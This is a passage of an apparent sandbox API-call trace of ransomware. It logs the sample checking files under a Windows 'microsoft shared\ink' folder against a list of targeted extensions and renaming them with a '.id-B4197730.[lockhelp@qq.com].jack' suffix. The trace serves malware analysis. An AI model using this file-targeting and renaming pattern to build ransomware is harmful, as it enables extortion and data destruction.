files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0199.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.252] lstrlenW (lpString=".doc") returned 4 [0199.252] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString=".docx") returned 5 [0199.252] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0199.252] lstrlenW (lpString=".pdf") returned 4 [0199.252] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString=".xls") returned 4 [0199.252] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString=".xlsx") returned 5 [0199.252] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0199.252] lstrlenW (lpString=".ppt") returned 4 [0199.252] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.252] lstrlenW (lpString=".zip") returned 4 [0199.252] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString=".rar") returned 4 [0199.252] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString=".bz2") returned 4 [0199.252] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString=".7z") returned 3 [0199.252] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.252] lstrlenW (lpString=".dbf") returned 4 [0199.252] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.252] lstrlenW (lpString=".1cd") returned 4 [0199.253] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.253] lstrlenW (lpString=".jpg") returned 4 [0199.253] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.253] lstrlenW (lpString=".doc") returned 4 [0199.253] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString=".docx") returned 5 [0199.253] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0199.253] lstrlenW (lpString=".pdf") returned 4 [0199.253] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString=".xls") returned 4 [0199.253] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString=".xlsx") returned 5 [0199.253] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0199.253] lstrlenW (lpString=".ppt") returned 4 [0199.253] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.253] lstrlenW (lpString=".zip") returned 4 [0199.253] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString=".rar") returned 4 [0199.253] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString=".bz2") returned 4 [0199.253] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.253] lstrlenW (lpString=".7z") returned 3 [0199.254] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.254] lstrlenW (lpString=".dbf") returned 4 [0199.254] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.254] lstrlenW (lpString=".1cd") returned 4 [0199.254] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0199.254] lstrlenW (lpString=".jpg") returned 4 [0199.254] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.254] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.254] lstrlenW (lpString="boxed-join.avi") returned 14 [0199.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0199.264] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=46622) returned 1 [0199.264] CloseHandle (hObject=0x41c) returned 1 [0199.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0199.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.265] lstrlenW (lpString=".doc") returned 4 [0199.265] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString=".docx") returned 5 [0199.265] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0199.265] lstrlenW (lpString=".pdf") returned 4 [0199.265] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString=".xls") returned 4 [0199.265] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString=".xlsx") returned 5 [0199.265] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0199.265] lstrlenW (lpString=".ppt") returned 4 [0199.265] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.265] lstrlenW (lpString=".zip") returned 4 [0199.265] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString=".rar") returned 4 [0199.265] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString=".bz2") returned 4 [0199.265] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.265] lstrlenW (lpString=".7z") returned 3 [0199.265] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.265] lstrlenW (lpString=".dbf") returned 4 [0199.265] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.266] lstrlenW (lpString=".1cd") returned 4 [0199.266] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.266] lstrlenW (lpString=".jpg") returned 4 [0199.266] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.266] lstrlenW (lpString=".doc") returned 4 [0199.266] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString=".docx") returned 5 [0199.266] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0199.266] lstrlenW (lpString=".pdf") returned 4 [0199.266] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString=".xls") returned 4 [0199.266] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString=".xlsx") returned 5 [0199.266] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0199.266] lstrlenW (lpString=".ppt") returned 4 [0199.266] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.266] lstrlenW (lpString=".zip") returned 4 [0199.266] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString=".rar") returned 4 [0199.266] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.266] lstrlenW (lpString=".bz2") returned 4 [0199.267] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.267] lstrlenW (lpString=".7z") returned 3 [0199.267] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.267] lstrlenW (lpString=".dbf") returned 4 [0199.267] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.267] lstrlenW (lpString=".1cd") returned 4 [0199.267] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0199.267] lstrlenW (lpString=".jpg") returned 4 [0199.267] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.267] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.267] lstrlenW (lpString="delete.avi") returned 10 [0199.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0199.269] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=208408) returned 1 [0199.269] CloseHandle (hObject=0x410) returned 1 [0199.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0199.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.269] lstrlenW (lpString=".doc") returned 4 [0199.270] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString=".docx") returned 5 [0199.270] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0199.270] lstrlenW (lpString=".pdf") returned 4 [0199.270] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString=".xls") returned 4 [0199.270] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString=".xlsx") returned 5 [0199.270] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0199.270] lstrlenW (lpString=".ppt") returned 4 [0199.270] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.270] lstrlenW (lpString=".zip") returned 4 [0199.270] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString=".rar") returned 4 [0199.270] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString=".bz2") returned 4 [0199.270] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString=".7z") returned 3 [0199.270] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.270] lstrlenW (lpString=".dbf") returned 4 [0199.270] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.270] lstrlenW (lpString=".1cd") returned 4 [0199.270] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.271] lstrlenW (lpString=".jpg") returned 4 [0199.271] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.271] lstrlenW (lpString=".doc") returned 4 [0199.271] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString=".docx") returned 5 [0199.271] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0199.271] lstrlenW (lpString=".pdf") returned 4 [0199.271] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString=".xls") returned 4 [0199.271] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString=".xlsx") returned 5 [0199.271] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0199.271] lstrlenW (lpString=".ppt") returned 4 [0199.271] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.271] lstrlenW (lpString=".zip") returned 4 [0199.271] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString=".rar") returned 4 [0199.271] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString=".bz2") returned 4 [0199.271] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.271] lstrlenW (lpString=".7z") returned 3 [0199.271] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.272] lstrlenW (lpString=".dbf") returned 4 [0199.272] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.272] lstrlenW (lpString=".1cd") returned 4 [0199.272] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0199.272] lstrlenW (lpString=".jpg") returned 4 [0199.272] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.272] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.272] lstrlenW (lpString="join.avi") returned 8 [0199.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0199.276] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=199994) returned 1 [0199.276] CloseHandle (hObject=0x430) returned 1 [0199.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0199.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.276] lstrlenW (lpString=".doc") returned 4 [0199.276] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.276] lstrlenW (lpString=".docx") returned 5 [0199.276] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0199.276] lstrlenW (lpString=".pdf") returned 4 [0199.276] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.276] lstrlenW (lpString=".xls") returned 4 [0199.277] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString=".xlsx") returned 5 [0199.277] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0199.277] lstrlenW (lpString=".ppt") returned 4 [0199.277] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.277] lstrlenW (lpString=".zip") returned 4 [0199.277] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString=".rar") returned 4 [0199.277] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString=".bz2") returned 4 [0199.277] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString=".7z") returned 3 [0199.277] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.277] lstrlenW (lpString=".dbf") returned 4 [0199.277] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.277] lstrlenW (lpString=".1cd") returned 4 [0199.277] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.277] lstrlenW (lpString=".jpg") returned 4 [0199.277] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.277] lstrlenW (lpString=".doc") returned 4 [0199.278] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString=".docx") returned 5 [0199.278] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0199.278] lstrlenW (lpString=".pdf") returned 4 [0199.278] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString=".xls") returned 4 [0199.278] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString=".xlsx") returned 5 [0199.278] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0199.278] lstrlenW (lpString=".ppt") returned 4 [0199.278] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.278] lstrlenW (lpString=".zip") returned 4 [0199.278] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString=".rar") returned 4 [0199.278] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString=".bz2") returned 4 [0199.278] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString=".7z") returned 3 [0199.278] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.278] lstrlenW (lpString=".dbf") returned 4 [0199.278] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.278] lstrlenW (lpString=".1cd") returned 4 [0199.279] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0199.279] lstrlenW (lpString=".jpg") returned 4 [0199.279] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.279] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.279] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0199.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0199.317] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1600388) returned 1 [0199.318] CloseHandle (hObject=0x430) returned 1 [0199.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0199.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.318] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0199.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.318] lstrlenW (lpString=".doc") returned 4 [0199.318] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.318] lstrlenW (lpString=".docx") returned 5 [0199.318] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0199.318] lstrlenW (lpString=".pdf") returned 4 [0199.318] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.318] lstrlenW (lpString=".xls") returned 4 [0199.318] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.318] lstrlenW (lpString=".xlsx") returned 5 [0199.318] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0199.319] lstrlenW (lpString=".ppt") returned 4 [0199.319] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.319] lstrlenW (lpString=".zip") returned 4 [0199.319] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.319] lstrlenW (lpString=".rar") returned 4 [0199.319] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.319] lstrlenW (lpString=".bz2") returned 4 [0199.319] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.319] lstrlenW (lpString=".7z") returned 3 [0199.319] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.319] lstrlenW (lpString=".dbf") returned 4 [0199.319] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.319] lstrlenW (lpString=".1cd") returned 4 [0199.319] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.319] lstrlenW (lpString=".jpg") returned 4 [0199.320] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.320] lstrlenW (lpString=".doc") returned 4 [0199.320] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString=".docx") returned 5 [0199.320] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0199.320] lstrlenW 